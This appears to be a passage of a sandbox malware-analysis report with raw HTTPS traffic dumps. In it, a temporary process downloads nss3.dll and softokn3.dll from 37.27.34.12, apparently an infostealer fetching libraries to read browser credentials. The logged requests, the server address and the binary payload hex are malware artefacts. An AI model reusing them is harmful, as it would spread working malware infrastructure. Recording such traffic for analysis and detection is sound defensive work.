                                                            2024-05-27 13:24:35 UTC16384INData Raw: c0 89 45 f4 de ea d9 c9 d9 5d e8 d9 45 e8 d9 55 10 d9 ee da e9 df e0 f6 c4 44 7b 05 dd d8 d9 45 10 8d 45 ec 50 8d 45 f8 50 d9 5d ec e8 fc fa ff ff 59 59 3b f3 0f 8c aa fd ff ff eb 10 8d 4e 01 d9 1c b7 3b cb 7d 06 d9 ee d9 5c b7 04 5e 8b c7 5f 5b c9 c3 55 8b ec 51 56 33 f6 39 75 14 7e 37 d9 ee 57 8b 7d 10 d9 04 b7 d9 5d fc d9 45 fc dd e1 df e0 dd d9 f6 c4 44 7b 1a 51 d9 1c 24 ff 75 0c ff 75 08 e8 97 fc ff ff d9 ee 83 c4 0c 46 3b 75 14 7c d2 dd d8 5f 8b 45 08 5e c9 c3 55 8b ec 51 51 8b 4d 0c 85 c9 75 04 d9 ee c9 c3 8b 55 08 83 f9 01 0f 84 9d 00 00 00 d9 02 d9 5d fc d9 45 fc d9 ee dd e1 df e0 f6 c4 44 0f 8b 82 00 00 00 d9 42 04 d9 5d fc d9 45 fc dd e1 df e0 f6 c4 44 7b 6e 83 f9 02 74 5d d9 42 08 d9 5d fc d9 45 fc dd e2 df e0 dd da f6 c4 44 7b 49 d9 c2 d8 c1
                                                            Data Ascii: E]EUD{EEPEP]YY;N;}\^_[UQV39u~7W}]ED{Q$uuF;u|_E^UQQMuU]EDB]ED{nt]B]ED{I
                                                            2024-05-27 13:24:35 UTC16384INData Raw: f7 0f b7 06 66 3b c1 74 0e 66 3b c2 74 09 8b 45 08 33 db 8b 30 eb 43 03 f7 6a 04 5b 89 75 f8 66 83 3e 28 89 5d f4 75 32 8b de 03 df 68 07 01 00 00 0f b7 03 50 ff 15 ac 72 06 10 59 59 85 c0 75 e9 0f b7 03 83 f8 5f 74 e1 89 5d f8 8b 5d f4 83 f8 29 75 06 8b 75 f8 83 c6 02 8b 45 0c 85 c0 74 02 89 30 8b 45 08 5f 89 30 8b c3 5e 5b c9 c3 55 8b ec 83 ec 48 a1 c0 41 06 10 33 c5 89 45 fc 6b 4d 18 07 33 d2 8b 45 10 53 8b 5d 14 56 8b 75 0c 89 75 d0 89 45 b8 89 55 bc 89 55 c4 89 55 c0 89 4d cc 57 8b fa 83 f9 23 7e 06 6a 23 59 89 4d cc 6a 30 58 89 13 89 53 04 66 39 06 75 12 c7 45 c4 01 00 00 00 83 c6 02 66 39 06 74 f8 89 75 d0 0f b7 0e b8 b8 2d 00 10 89 4d c8 8b 4d cc c7 45 d4 16 00 00 00 8b 75 c8 66 39 30 8b 75 d0 74 0b 83 c0 02 83 6d d4 01 75 ec 8b c2 85 c0 74 26 3b
                                                            Data Ascii: f;tf;tE30Cj[uf>(]u2hPrYYu_t]])uuEt0E_0^[UHA3EkM3ES]VuuEUUUMW#~j#YMj0XSf9uEf9tu-MMEuf90utmut&;
                                                            2024-05-27 13:24:35 UTC16384INData Raw: cc cc cc cc cc cc 55 8b ec 6a ff 68 09 e7 03 10 64 a1 00 00 00 00 50 a1 c0 41 06 10 33 c5 50 8d 45 f4 64 a3 00 00 00 00 e8 79 7b 00 00 50 e8 71 d8 ff ff 59 8b 40 0c 8b 4d f4 64 89 0d 00 00 00 00 59 c9 c3 cc cc 55 8b ec 83 79 38 00 8b 45 08 75 03 83 c8 04 ff 75 0c 50 e8 28 00 00 00 5d c2 08 00 cc cc cc cc 55 8b ec 6a 00 ff 75 08 e8 13 00 00 00 5d c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 8b 45 08 83 ec 1c 83 e0 17 89 41 0c 8b 49 10 56 23 c8 74 43 80 7d 0c 00 75 42 f6 c1 04 74 07 be 78 54 00 10 eb 0f be 90 54 00 10 f6 c1 02 75 05 be a8 54 00 10 8d 45 f8 6a 01 50 e8 f7 13 00 00 59 59 50 56 8d 4d e4 e8 bc e2 ff ff 68 a4 1a 04 10 8d 45 e4 50 eb 09 5e c9 c2 08 00 6a 00 6a 00 e8 f0 93 02 00 cc 53 57 8b f9 83 7f 4c 00 75 04 33 db eb 24 56 e8
                                                            Data Ascii: UjhdPA3PEdy{PqY@MdYUy8EuuP(]Uju]UEAIV#tC}uBtxTTuTEjPYYPVMhEP^jjSWLu3$V
                                                            2024-05-27 13:24:35 UTC16384INData Raw: 83 c4 10 c6 04 1e 00 83 f8 10 72 0b 40 50 ff 37 e8 54 95 ff ff 59 59 89 37 8b c7 5f 5e 5b c9 c2 0c 00 e8 b3 be ff ff cc 55 8b ec 83 ec 0c 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d fc 3b c2 72 69 8b 43 14 8d 3c 11 57 8b cb 89 45 f4 e8 88 b1 ff ff 8b f0 8d 4e 01 51 e8 b2 94 ff ff 59 ff 75 18 89 7b 10 8d 4d 0c ff 75 14 8b 7d f4 89 45 f8 89 73 14 ff 75 10 ff 75 fc 83 ff 10 72 17 8b 33 56 50 e8 6b 03 00 00 8d 47 01 50 56 e8 d2 94 ff ff 59 59 eb 07 53 50 e8 56 03 00 00 8b 45 f8 5f 89 03 8b c3 5e 5b c9 c2 14 00 e8 25 be ff ff cc 55 8b ec 83 ec 10 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d f0 3b c2 0f 82 8f 00 00 00 8b 43 14 8d 3c 11 57 8b cb 89 45 fc e8 f6 b0 ff ff 8b f0 8d 4e 01 51 e8 20 94 ff ff 83 7d fc 10 59 0f be 4d 14 89
                                                            Data Ascii: r@P7TYY7_^[UUSVWK+M;riC<WENQYu{Mu}Esuur3VPkGPVYYSPVE_^[%UUSVWK+M;C<WENQ }YM
                                                            2024-05-27 13:24:35 UTC16384INData Raw: 4d d4 53 33 c0 03 04 cb 52 13 7c cb 04 56 57 50 e8 f1 02 02 00 5b 8b 5d 08 8b f9 8b 4d d4 8b 75 d8 89 54 cb 04 8b 55 e8 89 04 cb 83 e9 01 89 4d d4 79 cf 5f 5e 5b c9 c3 55 8b ec 51 56 8b 75 14 33 d2 85 f6 7e 5f 53 8b 5d 08 29 5d 10 57 8b fb 89 75 fc 8b 5d 10 8b 0c 3b 03 0f 8b 44 3b 04 13 47 04 03 ca 89 0f 8d 7f 08 83 d0 00 8b d0 89 57 fc 83 67 fc 00 83 ee 01 75 dc 0b c6 8b 5d 08 74 22 8b 4d fc 3b 4d 0c 7d 1a 01 14 cb 8b 54 cb 04 13 d6 33 f6 89 54 cb 04 8b c2 21 74 cb 04 41 0b c6 75 e1 5f 5b 5e c9 c3 55 8b ec 8b 55 08 56 8b 75 0c 83 c2 f8 8d 14 f2 8b 02 0b 42 04 75 0b 8d 52 f8 4e 8b 0a 0b 4a 04 74 f5 8b c6 5e 5d c3 55 8b ec 53 56 33 db 33 f6 39 5d 0c 7e 30 57 8b 7d 08 ff 75 14 ff 75 10 ff 74 f7 04 ff 34 f7 e8 73 03 02 00 03 c3 89 04 f7 83 d2 00 8b da 89 5c
                                                            Data Ascii: MS3R|VWP[]MuTUMy_^[UQVu3~_S])]Wu];D;GWgu]t"M;M}T3T!tAu_[^UUVuBuRNJt^]USV339]~0W}uut4s\
                                                            2024-05-27 13:24:35 UTC16384INData Raw: 89 75 fc 89 46 04 c7 06 7c 69 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 8b 45 0c 56 8b f1 89 75 fc 89 46 04 c7 06 e8 65 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 56 8b f1 ff 76 0c c7 06 4c 68 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 56 8b f1 ff 76 0c c7 06 8c 66 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc 56 8b f1 c7 06 50 69 00 10 e8 e2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 c7 06 90 67 00 10 e8 c2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 ff 76 08 c7 06 7c 69 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10
                                                            Data Ascii: uF|ifrjFqY^UQEVuFefrjFqY^VvLhqY(R^VvfqY(R^VPiq(R^Vgq(R^Vv|iqY(R
                                                            2024-05-27 13:24:35 UTC16384INData Raw: 80 7f 04 00 75 07 8b cf e8 85 26 00 00 0f b7 47 06 50 ff b5 74 ff ff ff e8 9a a8 ff ff 59 59 83 f8 0a 73 3c 8a 80 2c 6a 00 10 8b 4d 8c 88 85 64 ff ff ff ff b5 64 ff ff ff e8 5f 18 ff ff 8b 4d d8 8d 45 d8 83 fb 10 72 02 8b c1 80 3c 30 7f 74 4c 8d 45 d8 83 fb 10 72 02 8b c1 fe 04 30 eb 3a 8d 45 d8 83 fb 10 72 03 8b 45 d8 80 3c 30 00 74 45 80 7f 04 00 0f b7 47 06 75 0b 8b cf e8 10 26 00 00 0f b7 47 06 66 3b 85 60 ff ff ff 75 27 6a 00 8d 4d d8 e8 04 18 ff ff 46 8b 5d ec 8b cf e8 24 11 00 00 ff 75 98 8b cf e8 de 72 00 00 84 c0 0f 84 4a ff ff ff 8b 5d 90 85 f6 74 13 83 7d ec 10 8d 45 d8 72 03 8b 45 d8 80 3c 30 00 7e 52 46 8a 45 a7 83 7d d4 10 8d 55 c0 72 03 8b 55 c0 84 c0 75 49 85 f6 74 5e 8a 0a 80 f9 7f 74 57 83 ee 01 74 11 83 7d ec 10 8d 45 d8 72 03 8b 45 d8
                                                            Data Ascii: u&GPtYYs<,jMdd_MEr<0tLEr0:ErE<0tEGu&Gf;`u'jMF]$urJ]t}ErE<0~RFE}UrUuIt^tWt}ErE


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            22192.168.2.85310537.27.34.124437360C:\Users\user\AppData\Local\Temp\katDDA4.tmp
                                                            TimestampBytes transferredDirectionData
                                                            2024-05-27 13:24:36 UTC168OUTGET /nss3.dll HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                            Host: 37.27.34.12
                                                            Cache-Control: no-cache
                                                            2024-05-27 13:24:36 UTC248INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 27 May 2024 13:24:36 GMT
                                                            Content-Type: application/octet-stream
                                                            Content-Length: 2046288
                                                            Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                            Connection: close
                                                            ETag: "6315a9f4-1f3950"
                                                            Accept-Ranges: bytes
                                                            2024-05-27 13:24:36 UTC16136INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00
                                                            Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@
                                                            2024-05-27 13:24:36 UTC16384INData Raw: 89 c2 69 f3 90 01 00 00 29 f0 83 e2 03 66 85 d2 0f 94 c2 66 85 ff 0f 95 c6 20 d6 66 85 c0 0f 94 c0 08 f0 0f b6 c0 8d 04 40 8b 55 f0 0f be 84 82 20 7c 1a 10 89 41 10 8a 41 1a fe c8 0f b6 c0 ba 06 00 00 00 0f 49 d0 88 51 1a e9 f7 fe ff ff 83 c2 e8 89 51 0c 8b 41 10 89 45 f0 8b 71 14 40 89 41 10 66 ff 41 1c 0f b7 41 18 a8 03 0f 94 c3 69 f8 29 5c 00 00 8d 97 1c 05 00 00 66 c1 ca 02 0f b7 d2 81 fa 8f 02 00 00 0f 93 c2 20 da 81 c7 10 05 00 00 66 c1 cf 04 0f b7 ff 81 ff a3 00 00 00 0f 92 c6 08 d6 0f b6 d6 8d 14 52 0f be 94 96 20 7c 1a 10 39 55 f0 7c 26 89 f7 c7 41 10 01 00 00 00 8d 56 01 89 51 14 83 fe 0b 7c 12 c7 41 14 00 00 00 00 40 66 89 41 18 66 c7 41 1c 00 00 8a 41 1a fe c0 31 d2 3c 07 0f b6 c0 0f 4d c2 88 41 1a e9 51 fe ff ff c7 41 14 0b 00 00 00 8b 51 18
                                                            Data Ascii: i)ff f@U |AAIQQAEq@AfAAi)\f fR |9U|&AVQ|A@fAfAA1<MAQAQ
                                                            2024-05-27 13:24:36 UTC16384INData Raw: 7f 06 00 74 69 31 db 8b 44 9f 14 be 48 01 1d 10 85 c0 74 02 8b 30 68 d3 fe 1b 10 56 e8 f7 5b 19 00 83 c4 08 85 c0 b8 79 64 1c 10 0f 45 c6 8b 4f 10 0f b6 0c 19 f6 c1 02 ba 98 dc 1c 10 be 48 01 1d 10 0f 44 d6 f6 c1 01 b9 b1 de 1c 10 0f 44 ce 50 52 51 68 7f a0 1b 10 8d 44 24 60 50 e8 d6 b7 06 00 83 c4 14 43 0f b7 47 06 39 c3 72 99 8b 44 24 60 8d 48 01 3b 4c 24 58 0f 83 b7 03 00 00 89 4c 24 60 8b 4c 24 54 c6 04 01 29 eb 25 8b 44 24 04 8b 4c 24 08 8b 44 81 10 0f be 08 8d 54 24 50 51 ff 70 20 68 2c e2 1c 10 52 e8 89 b7 06 00 83 c4 10 f6 44 24 64 07 0f 85 4b 03 00 00 8b 44 24 54 85 c0 74 21 8b 4c 24 60 c6 04 08 00 83 7c 24 5c 00 74 12 f6 44 24 65 04 75 0b 8d 4c 24 50 e8 d4 68 06 00 eb 04 8b 44 24 54 89 44 24 18 8b 45 08 8b 80 a0 00 00 00 83 e0 0c 83 f8 08 0f 85
                                                            Data Ascii: ti1DHt0hV[ydEOHDDPRQhD$`PCG9rD$`H;L$XL$`L$T)%D$L$DT$PQp h,RD$dKD$Tt!L$`|$\tD$euL$PhD$TD$E
                                                            2024-05-27 13:24:36 UTC16384INData Raw: 11 1e 10 77 26 8b 35 38 11 1e 10 85 f6 74 15 8b 0d 78 e0 1d 10 81 f9 80 c2 12 10 75 7b 56 ff 15 68 cc 1d 10 89 f8 5e 5f 5b 5d c3 a3 30 11 1e 10 eb d3 a3 0c 11 1e 10 eb b9 89 3d 20 11 1e 10 e9 54 ff ff ff 31 ff eb dc 8b 0d 40 e0 1d 10 ff 15 00 40 1e 10 57 ff d1 83 c4 04 eb ca ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 0b ff ff ff 89 f7 c1 ff 1f 29 f1 19 f8 31 d2 39 0d e4 10 1e 10 19 c2 7d 27 c7 05 50 11 1e 10 00 00 00 00 e9 20 ff ff ff 31 ff e9 6d ff ff ff ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 7b ff ff ff c7 05 50 11 1e 10 01 00 00 00 8b 1d 38 11 1e 10 85 db 74 2e 8b 0d 78 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 8b 1d 38 11 1e 10 85 db 74 12 8b 0d 70 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 a1 4c 11 1e 10 8b 0d 48 11 1e 10 89 ca 09 c2 0f 84 b1 fe ff
                                                            Data Ascii: w&58txu{Vh^_[]0= T1@@W@V)19}'P 1m@V{P8t.x@S8tp@SLH
                                                            2024-05-27 13:24:36 UTC16384INData Raw: 24 08 8b 70 44 8b 06 85 c0 0f 84 81 fd ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 67 fd ff ff 8b 44 24 08 8b 70 40 8b 06 85 c0 74 2d 8b 4c 24 08 80 79 0d 00 75 11 8b 48 20 ff 15 00 40 1e 10 6a 01 56 ff d1 83 c4 08 8b 44 24 08 80 78 12 05 74 08 8b 44 24 08 c6 40 12 01 8b 4c 24 08 8a 41 0c 88 41 13 e9 13 fe ff ff 8b 44 24 08 8b 30 8b 4e 1c 85 c9 0f 84 88 fa ff ff 8b 44 24 08 8b b8 ec 00 00 00 ff 15 00 40 1e 10 6a 00 57 56 ff d1 83 c4 0c 89 44 24 0c e9 72 f6 ff ff 8b 4c 24 08 89 81 a0 00 00 00 e9 f7 f9 ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 26 fa ff ff 31 f6 46 e9 d2 fc ff ff 31 db f6 44 24 1c 01 0f 84 40 fe ff ff 68 40 7e 1c 10 68 83 e4 00 00 68 14 dd 1b 10 68 78 fc 1b 10 6a 0e e8 0a 8f 02 00 83
                                                            Data Ascii: $pDH@VgD$p@t-L$yuH @jVD$xtD$@L$AAD$0ND$@jWVD$rL$H@V&1F1D$@h@~hhhxj
                                                            2024-05-27 13:24:36 UTC16384INData Raw: 6f 8b 7d 0c 89 54 24 04 8b 0d 30 e4 1d 10 8b 45 08 8b 40 08 89 04 24 ff 15 00 40 1e 10 8d 44 24 10 50 8d 44 24 10 50 56 57 ff 74 24 10 ff d1 85 c0 0f 84 92 00 00 00 8b 44 24 0c 85 c0 8b 54 24 04 74 42 29 c6 72 3e 01 c2 83 d3 00 89 54 24 18 89 d9 81 e1 ff ff ff 7f 89 4c 24 1c 01 c7 85 f6 7f a2 8b 44 24 24 85 c0 0f 85 92 00 00 00 31 ff 8b 4c 24 28 31 e9 e8 9d 64 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 8b 0d 8c e2 1d 10 ff 15 00 40 1e 10 ff d1 89 c2 8b 45 08 89 50 14 83 fa 70 74 05 83 fa 27 75 3f bf 0d 00 00 00 b9 0d 00 00 00 68 ee b2 00 00 8b 45 08 ff 70 1c 68 65 8a 1c 10 e8 c4 1e 14 00 83 c4 0c eb a7 8d 4c 24 24 8d 54 24 08 e8 12 20 14 00 85 c0 0f 85 2a ff ff ff 8b 54 24 08 eb b1 bf 0a 03 00 00 b9 0a 03 00 00 68 f3 b2 00 00 8b 45 08 ff 70 1c 68 20 85 1c 10 eb
                                                            Data Ascii: o}T$0E@$@D$PD$PVWt$D$T$tB)r>T$L$D$$1L$(1de^_[]@EPpt'u?hEpheL$$T$ *T$hEph
                                                            2024-05-27 13:24:36 UTC16384INData Raw: 68 7c ec 8b 44 24 0c 89 46 68 83 7c 24 04 01 75 72 8b 56 64 8d 1c 40 c1 e3 04 83 7c 1a 1c 00 74 4b 8b 4e 48 8b 01 85 c0 74 42 3d 58 00 1a 10 75 34 8b 86 a8 00 00 00 8b be ac 00 00 00 83 c0 04 83 d7 00 89 74 24 04 89 d6 8b 54 1a 18 0f af fa f7 e2 01 fa 52 50 51 e8 8c 45 12 00 89 f2 8b 74 24 10 83 c4 0c 8b 44 1a 18 89 46 38 31 ff 8b 4c 24 30 31 e9 e8 9f 24 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 89 74 24 04 8b 86 e8 00 00 00 89 44 24 08 85 c0 0f 84 88 01 00 00 83 7c 24 0c 00 0f 84 ac 00 00 00 8b 44 24 04 8b 70 64 85 f6 0f 84 9d 00 00 00 8b 44 24 0c 48 8d 3c 40 c1 e7 04 8b 44 3e 14 89 44 24 0c b9 00 02 00 00 31 d2 e8 56 3e ff ff 89 44 24 18 85 c0 0f 84 ce 02 00 00 8d 04 3e 89 44 24 14 8d 04 3e 83 c0 14 89 44 24 08 8b 5c 24 18 89 d8 83 c0 04 68 fc 01 00 00 6a 00
                                                            Data Ascii: h|D$Fh|$urVd@|tKNHtB=Xu4t$TRPQEt$DF81L$01$e^_[]t$D$|$D$pdD$H<@D>D$1V>D$>D$>D$\$hj
                                                            2024-05-27 13:24:36 UTC16384INData Raw: 00 00 00 8b 99 48 01 00 00 85 db 75 6b 8b 99 44 01 00 00 85 db 75 7b ff 81 40 01 00 00 8a 5d f3 88 d8 50 e8 d0 ca 11 00 83 c4 04 89 c3 85 c0 0f 84 a7 00 00 00 57 ff 75 e4 53 e8 0f 1c 18 00 83 c4 0c c6 04 3b 00 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c 89 18 0f b6 0b 80 b9 7a f8 19 10 00 78 4a 8b 4d e8 80 b9 d0 00 00 00 02 0f 83 83 00 00 00 83 c4 10 5e 5f 5b 5d c3 8b 03 89 81 48 01 00 00 e9 50 ff ff ff 8b 03 89 81 4c 01 00 00 e9 43 ff ff ff 8b 03 89 81 44 01 00 00 e9 36 ff ff ff ff 81 3c 01 00 00 e9 73 ff ff ff 80 f9 5b 0f b6 c9 ba 5d 00 00 00 0f 45 d1 89 55 ec 31 f6 46 89 df 8a 0c 33 3a 4d ec 74 06 88 0f 46 47 eb f2 8b 4d ec 38 4c 33 01 74 2d c6 07 00 eb 84 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c c7 00 00 00 00 00 e9 6d ff ff ff 8b 10 8b 4d e8 83 c4 10 5e 5f 5b 5d
                                                            Data Ascii: HukDu{@]PWuS;MzxJM^_[]HPLCD6<s[]EU1F3:MtFGM8L3t-MmM^_[]
                                                            2024-05-27 13:24:36 UTC16384INData Raw: f6 ff ff 8b 57 10 85 d2 74 09 8b 4c 24 20 e8 75 c2 ff ff 8b 7c 24 0c c7 47 10 00 00 00 00 e9 98 f6 ff ff 8b 06 89 81 44 01 00 00 e9 e3 f9 ff ff ff 81 3c 01 00 00 e9 80 fc ff ff 8b 44 24 14 80 b8 d0 00 00 00 00 0f 85 f3 fb ff ff 8b 44 24 20 8b 40 10 8b 4c 38 0c 83 79 48 00 0f 85 de fb ff ff ff 34 38 68 b4 e0 1c 10 ff 74 24 1c e8 06 09 00 00 83 c4 0c e9 c5 fb ff ff 8b 4c 24 1c e9 ae fd ff ff 8a 80 08 f7 19 10 3a 83 08 f7 19 10 0f 84 02 fa ff ff e9 c9 f9 ff ff 8b 44 24 20 80 b8 b1 00 00 00 00 0f 84 47 04 00 00 68 48 01 1d 10 ff 74 24 18 e8 5f 2a 01 00 83 c4 08 e9 33 f7 ff ff 8b 44 24 0c 80 48 1e 01 66 83 78 22 00 0f 8e a5 f5 ff ff 31 c9 b8 0e 00 00 00 8b 54 24 0c 8b 52 04 8b 74 02 f6 89 f7 c1 ef 04 83 e7 0f 83 ff 01 74 09 85 ff 75 0a e9 69 03 00 00 c6 44 02
                                                            Data Ascii: WtL$ u|$GD<D$D$ @L8yH48ht$L$:D$ GhHt$_*3D$Hfx"1T$RttuiD
                                                            2024-05-27 13:24:36 UTC16384INData Raw: c7 44 24 24 00 00 00 00 e9 0b f1 ff ff 8b 44 24 0c 8b 40 10 8b 40 1c 8b 4c 24 08 3b 41 3c 0f 84 95 ea ff ff 8b 7c 24 08 ff 37 68 27 f8 1c 10 ff 74 24 0c e8 e0 ea 00 00 83 c4 0c c7 44 24 24 00 00 00 00 e9 a2 f0 ff ff 68 48 e4 1b 10 8b 7c 24 08 57 e8 c1 ea 00 00 83 c4 08 be 0b 00 00 00 68 40 7e 1c 10 68 14 ce 01 00 68 40 bb 1b 10 68 78 fc 1b 10 56 e8 8f 4f 01 00 83 c4 14 89 77 0c c7 44 24 1c 00 00 00 00 e9 83 f8 ff ff 66 ba 1e 00 31 c0 85 c9 0f 85 54 f1 ff ff 31 d2 e9 5b f1 ff ff 31 ff 66 ba 28 00 be ff 0f 00 00 89 cb 31 c0 83 c2 28 89 f9 0f a4 d9 1c c1 e8 04 39 de bb 00 00 00 00 19 fb 89 cb 89 c7 0f 83 f2 f0 ff ff eb df a9 fd ff ff ff 74 65 31 f6 46 b8 ec bb 1b 10 e9 c1 fd ff ff 31 c0 e9 85 f2 ff ff c7 44 24 18 00 00 00 00 e9 36 f8 ff ff 8b 40 14 e9 d1 e9
                                                            Data Ascii: D$$D$@@L$;A<|$7h't$D$$hH|$Wh@~hh@hxVOwD$f1T1[1f(1(9te1F1D$6@


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            23192.168.2.85310637.27.34.124437360C:\Users\user\AppData\Local\Temp\katDDA4.tmp
                                                            TimestampBytes transferredDirectionData
                                                            2024-05-27 13:24:39 UTC172OUTGET /softokn3.dll HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                            Host: 37.27.34.12
                                                            Cache-Control: no-cache
                                                            2024-05-27 13:24:39 UTC246INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 27 May 2024 13:24:39 GMT
                                                            Content-Type: application/octet-stream
                                                            Content-Length: 257872
                                                            Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                            Connection: close
                                                            ETag: "6315a9f4-3ef50"
                                                            Accept-Ranges: bytes
                                                            2024-05-27 13:24:39 UTC16138INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00
                                                            Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSw
                                                            2024-05-27 13:24:39 UTC16384INData Raw: ff 89 85 f4 fe ff ff c7 85 f8 fe ff ff 04 00 00 00 8d 85 f0 fe ff ff 6a 01 50 53 57 e8 85 af 00 00 83 c4 10 89 c6 85 c0 75 3f 8b 85 ec fe ff ff 83 c0 fd 83 f8 01 77 25 be 30 00 00 00 83 3d 28 9a 03 10 00 75 23 83 3d 50 90 03 10 00 74 0e be 01 01 00 00 f6 05 20 9a 03 10 01 74 0c 53 57 e8 e2 b9 00 00 83 c4 08 89 c6 83 3d 2c 9a 03 10 00 0f 84 5e ff ff ff 8b 85 ec fe ff ff 83 c0 fe 83 f8 02 0f 87 4c ff ff ff 56 53 57 68 85 6b 03 10 68 00 01 00 00 8d 85 f0 fe ff ff 50 ff 15 1c 7c 03 10 83 c4 18 e9 2a ff ff ff cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 08 01 00 00 a1 14 90 03 10 31 e8 89 45 f0 c7 85 ec fe ff ff 00 00 00 00 be 30 00 00 00 83 3d 28 9a 03 10 00 74 17 8b 4d f0 31 e9 e8 28 8b 02 00 89 f0 81 c4 08 01 00 00 5e 5f 5b 5d c3 8b 5d 0c c7
                                                            Data Ascii: jPSWu?w%0=(u#=Pt tSW=,^LVSWhkhP|*USWV1E0=(tM1(^_[]]
                                                            2024-05-27 13:24:39 UTC16384INData Raw: ff 83 c4 10 85 c0 0f 85 6b 03 00 00 57 e8 c4 9d ff ff 83 c4 04 ff 75 e8 53 57 e8 f7 9d ff ff 83 c4 0c ff 75 e8 8d 45 e8 50 53 57 e8 26 9e ff ff 83 c4 10 85 c0 0f 85 3c 03 00 00 8b 4d c8 83 c1 01 8b 75 e4 8b 45 dc 01 f0 3b 4d c0 0f 85 6c ff ff ff 31 f6 e9 20 03 00 00 31 f6 ff 35 30 9a 03 10 ff 15 f0 7b 03 10 83 c4 04 a1 34 9a 03 10 85 c0 74 15 6a 01 50 e8 57 4e 02 00 83 c4 08 c7 05 34 9a 03 10 00 00 00 00 a1 38 9a 03 10 85 c0 74 15 6a 01 50 e8 39 4e 02 00 83 c4 08 c7 05 38 9a 03 10 00 00 00 00 a1 3c 9a 03 10 85 c0 74 15 6a 01 50 e8 1b 4e 02 00 83 c4 08 c7 05 3c 9a 03 10 00 00 00 00 56 e8 e8 4d 02 00 83 c4 04 a3 34 9a 03 10 8b 47 38 a3 40 9a 03 10 8b 47 28 a3 44 9a 03 10 8b 47 2c a3 48 9a 03 10 8d 47 04 50 e8 bf 4d 02 00 83 c4 04 a3 38 9a 03 10 ff 75 0c e8
                                                            Data Ascii: kWuSWuEPSW&<MuE;Ml1 150{4tjPWN48tjP9N8<tjPN<VM4G8@G(DG,HGPM8u
